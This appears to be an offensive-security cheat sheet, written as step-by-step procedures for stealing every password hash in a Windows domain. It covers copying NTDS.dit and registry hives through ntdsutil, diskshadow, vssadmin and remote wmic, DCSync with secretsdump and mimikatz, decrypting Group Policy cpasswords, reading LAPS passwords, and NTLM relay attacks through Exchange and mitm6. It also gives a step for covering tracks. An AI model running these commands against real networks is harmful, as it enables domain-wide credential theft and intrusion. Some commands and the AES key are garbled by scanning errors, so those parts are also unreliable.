When Domain Admin access has been achieved you may attempt to extract all the domain user password hashes from the Domain Controller located in the 'NTDS.dit' file `C:\Windows\NTDS\NTDS.dit` . However this file is in constant use and locked so you can perform several methods to retrieve this file for offline cracking of user hashes. Manually save Windows (XP/Vista/7) registry hive tables using 'reg.exe': ``` C:\WINDOWS\system32>reg.exe save HKLM\SAM C:\temp\sam_backup.hiv C:\WINDOWS\system32>reg.exe save HKLM\SECURITY C:\temp\sec_backup.hiv C:\WINDOWS\system32>reg.exe save HKLM\system C:\temp\sys_backup.hiv ``` ## [[NTDSUTIL]] The 'ntdsutil' utility is packaged with Windows DC's to manage Active Directory. STEP 1: Execute the 'ntdsutil' ``` C:\>ntdsutil ``` STEP 2: For the prompt 'ntdsutil:' execute ``` activate instance ntds ``` STEP 3: For the next prompt 'ntdsutil:' execute ``` ifm ``` STEP 4: For the prompt 'ifm:' execute ``` create full C:\temp\ntdsutil ``` STEP 5: After STEP 4 finishes, execute 'quit' for the 'ifm:' and 'ntdsutil:' ``` prompts to exit the util. quit quit ``` STEP 6: Retrieve the files from the newly created folders "Active Directory" (where the ntds.dit will be located) and "Registry" (where the SAM and SYSTEM files will be located): ``` C:\temp\ntdsutil\Active Directory C:\temp\ntdsutil\Registry ``` ## DISKSHADOW The 'diskshadow.exe' is a tool signed by Microsoft (Windows 2008/2012/2016) exposing functionality of the traditional !vss (Volume Shadow Copy Service). It posses an interactive and script mode. Below is a scripted mode for copying ntds.dit : STEP 1: Add the following into a text file 'diskshadow.txt' on target: ``` set context persistent nowriters add volume c: alias stealthAlias create expose %stealthAlias% z: exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\ntds.dit delete shadows volume %stealthAlias% reset ``` STEP 2: Execute our new script with diskshadow.exe. ``` !IMPORTANT! exe must be executed from C:\Windows\System32\ or else it will fail: C:\Windows\System32>diskshadow.exe /s c:\diskshadow.txt ``` STEP 3: Manually save the SYSTEM hive from the registry: ``` C:\Windows\system32>reg.exe save HKLM\system C:\temp\sys_backup.hiv ``` STEP 4: Retrieve the ntds.dit and sys_backup.hiv from C:temp: ``` C:\temp\ntds.dit C:\temp\sys_backup.hiv ``` ## VSSADMIN The 'vssadmin' is the Volume Shadow Copy Service included with Windows servers for managing volume shadow copy backups. STEP 1: Create a volume shadow copy: ``` C:\Windows\system32>vssadmin create shadow /for=C: ``` STEP 2: Copy ntds.dit into C:\temp from new volume shadow copy: ``` copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyl\windows\ntds\ntds.dit C:\temp\ntds.dit ``` STEP 3: Manually save the SYSTEM hive from the registry: ``` C:\Windows\system32>reg.exe save HKLM\system C:\temp\sys_backup.hiv ``` STEP 4: Retrieve the ntds.dit and sys_backup.hiv from C:temp: ``` C:\temp\ntds.dit C:\temp\sys_backup.hiv ``` STEP 5: Cover your tracks by deleting the newly created shadow volume: ``` C:\Windows\system32>vssadmin delete shadows /shadow={Shadow Copy ID} ``` ## WMI & VSSADMIN (Remotely extract NTDS.dit and SYSTEM hive) Use 'wmi' to execute 'vssadmin' remotely and retrieve ntds.dit and system hive. STEP 1: Use 'wmi' to execute 'vssadmin' to create new volume shadow copy: ``` wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1" ``` STEP 2: Extract 'ntds.dit' from the new volume shadow copy: ``` wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyl\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1" ``` STEP 3: Save off the SYSTEM hive from the registry: ``` wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyl\Windows\System32\config\SYSTEM\ C:\temp\sys_backup.hiv 2>&1" ``` STEP 4: Retrieve the ntds.dit and sys_backup.hiv from C:\temp: ``` C:\temp\ntds.dit C:\temp\sys_backup.hiv ``` ## EXTRACT DOMAIN HASHES FROM NTDS.DIT extract the user account hashes for offline cracking. ##### [[IMPACKET SECRETSDUMP]] https://github.com/SecureAuthCorp/impacket LOCAL: Use 'secretsdump.py' on your local attack workstation to extract the user account hashes from the ntds.dit using the SYSTEM hive sys_backup.hiv: ``` secretsdump.py -ntds ntds.dit -system sys_backup.hiv LOCAL ``` REMOTE: 'secretsdump.py' can optionally be used to remotely dump the user account hashes from a target Domain Controller using a Domain Admin hash (LM:NT} ``` impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:82f9aab58dd8jw614e268c4c6a657djw -just-de DOMAIN/DC_hostname\[email protected] ``` ##### [[MIMIKATZ]] Use mimikatz to pull account information LM hash, NTLM hash, History, etc. from a target user account. https://adsecurity.org/?p=2053 ``` mimikatz # lsadump::dcsync /domain:<DOMAIN.org.com> /user:<username> ``` [[INVOKE-DCSYNC]] Invoke-DCSync is a Powershell script which uses PowerView to interact with Mimikatz DCSync method to extract hashes with a DLL wrapper of PowerKatz. https://gist.github.com/monoxgas/9d238accd969550136db ``` PS> Invoke-DCSync -PWDumpFormat ``` ## DUMP SYSVOL & GROUP POLICY PREFS All Domain Controllers have a shared SYSVOL folder which contains files, scripts, and folders which must be synchronized across domain controllers. The contents can contain plaintext and encrypted credentials. Domain Group Policies are stored under `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\ ` STEP 1: Open the "run• window and find the logonserver folder: ``` run> %LOGONSERVER% ``` STEP 2: In SYSVOL search for XML, VBS or Batch files for: ``` 'cpassword' 'net user' 'pass' 'sPwd' Inside XML files the 'cpassword' value AES encryption key from Microsoft: 4e 99 06 es fc b6 6c c9 fa f4 93 10 f4 96 es 06 cc 05 79 90 20 9b 09 a4 is encrypted using the following 32-byte 62 0f fe es 33 b6 6c lb ``` You can use Get-GPPPassword for searching a Domain Controller for group policy preferences in groups.xml, scheduledtasks.xml, services.xml and datasources.xml and automatically decrypting 'cpassword' into plaintext passwords. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/GetGPPPassword.psl Automatically search and decrypt group policy related XML files: ``` PS C:\> Get-GPPPassword ``` Manually decrypt the 'cpassword' value found in XML files: ``` PS C:\> Get-GPPPassword '<cpassword_value>' ``` Remotely search, retrieve, and decrypt group policy related XML files: ``` PS C:\> Get-GPPPassword -Server EXAMPLE.COM ``` ## LAPS (Local Administration Password Solution) LAPS allows administrators to create random, manage, and store local administrative passwords for computers joined to the domain. Admins or users with appropriate access can read/write to LAPS created and stored credentials in plaintext. REFERENCE: https://room362.com/post/2017/dump-laps-passwords-with-ldapsearch/ STEP 1: Query your access machine to see if LAPS is enabled: ``` PS> Get-Childitem 'C:\Program Files\LAPS\CSE\AdmPwd.dll' ``` STEP 2: Git clone (l)Get-LAPSPasswords or (2)Power5ploit or (3)ldapsearch or (4)meterpreter: https://github.com/kfosaaen/Get-LAPSPasswords https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon STEP 3: Using a user with permissions to read LAPS, execute 1 of the 4 possible techniques: ``` (1) PS> Get-LAPSPasswords -DomainController <DC_IPAddr> -Credential <DOMAIN\username> I Format-Table -AutoSize (2) PS> Get-NetOU -FullData I Get-ObjectAcl -ResolveGUIDs I Where-Object {($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} (3) # ldapsearch -x -h <DC_IPAddr> -D <username> -w <password> -b "dc=<DOMAIN>,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd (4) meterpreter> run post/windows/gather/credentials/enum_laps PrivExchange +NTLMREALYX +EXCHANGE = ALL DOMAIN HASHES ``` ## EXCHANGE MAILBOX SCENARIO: You've obtained a user account and password for a user on your target network with an Exchange mailbox. Also you have access to Exchange with "Exchange Windows Permissions" group having "WriteDacl" on the Domain object in Active Directory, which allows a DCSync operation. This allows you to sync all the user hashed passwords in Active Directory. REFERENCE: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domainadmin/ STEP 1: You've obtained a valid username and password mailbox on Exchange. STEP 2: Install required tools: Impacket ntlmrelayx & secretsdump - https://github.com/SecureAuthCorp/impacket PrivExchange - https://github.com/dirkjanm/privexchange/ STEP 3: Dpen two new terminal windows to prepare for the attack. STEP 4: Start ntlmrelayx in relay mode pointing at the Domain Controller with any user that has a mailbox on Exchange: ``` TERMINAL #1 ntlmrelayx.py -t ldap://dc.lab.local --escalate-user <username> ``` STEP 5: Run 'privexchange.py' pointing at the Exchange server with '-ah' being your attacker IP address with ntlmrelayx listening: ``` TERMINAL #2 python privexchange.py -ah <ntlmrelayx_IPAddr> exchange.lab.local -u <username> -d testsegment.local ``` !!You should see "INFD: API call was successful" if this works!! STEP 6: Wait nearly a minute for the attack to complete in TERMINAL #1 where ntlmrelayx is listening. STEP 7: With your newly created privileges, using the same mailbox credentials used previously, you can now use 'secretsdump.py' to perform a DCSync operation against the Domain Controller dump all the domains user hashes: ``` secretsdump.py lab/<username>@dc.lab.local -just-de ``` ## HTTPATTACK + NTLMREALYX +EXCHANGE = ALL DOMAIN HASHES SCENARIO: You DO NOT HAVE A PASSWORD for a user on your target network with an Exchange mailbox but you have network access. Also you have access to Exchange with "Exchange Windows Permissions" group having "WriteDacl" on the Domain object in Active Directory, which allows a DCSync operation. This allows you to sync all the user hashed passwords in Active Directory. REFERENCE: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domainadmin/ STEP 1: Install required tools: Impacket ntlmrelayx & secretsdump - https://github.com/SecureAuthCorp/impacket [[PrivExchange]] - https://github.com/dirkjanm/privexchange/ [[mitm6]] - https://github.com/fox-it/mitm6/ STEP 2: Modify the attacker URL inside 'httpattack.py' to point to the IP address NTLMrelayx will be running and listening. STEP 3: Copy 'httpattack.py' into the following folder under Impacket: /impacket/impacket/examples/ntlmrelayx/attacks/ STEP 4: Go into impacket directory and upgrade to the modified version: ``` cd impacket/ pip install . --upgrade ``` STEP 5: Open two new terminal windows to prepare for the attack. STEP 6: Start ntlmrelayx in relay mode pointing at the Exchange server and '-wh' option pointing at any nonexistent host on the network: ``` TERMINAL #1 ntlmrelayx.py -6 -wh blah.lab.local -t https://exchange.lab.local/EWS/Exchange.asmx -1 �/tmp/ -socks -debug ``` STEP 7: Use LLMNR/NBNS/mitm6 spoofing to relay the authentication of a user on the network. https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ https://github.com/fox-it/mitm6/ TERMINAL #2 ``` sudo mitm6 -d lab.local ``` STEP 8: If successful you will see in the 'ntlmrelayx' Terminal #1 you'll see 'API call was successful'. STEP 9: With your newly created privileges, using the captured/relayed credentials from ntlmrelayx, you can now use 'secretsdump.py' to perform a DCSync operation against the Domain Controller dump all the domains user hashes: ``` secretsdump.py lab/<username>@dc.lab.local -just-de ``` [[Home]]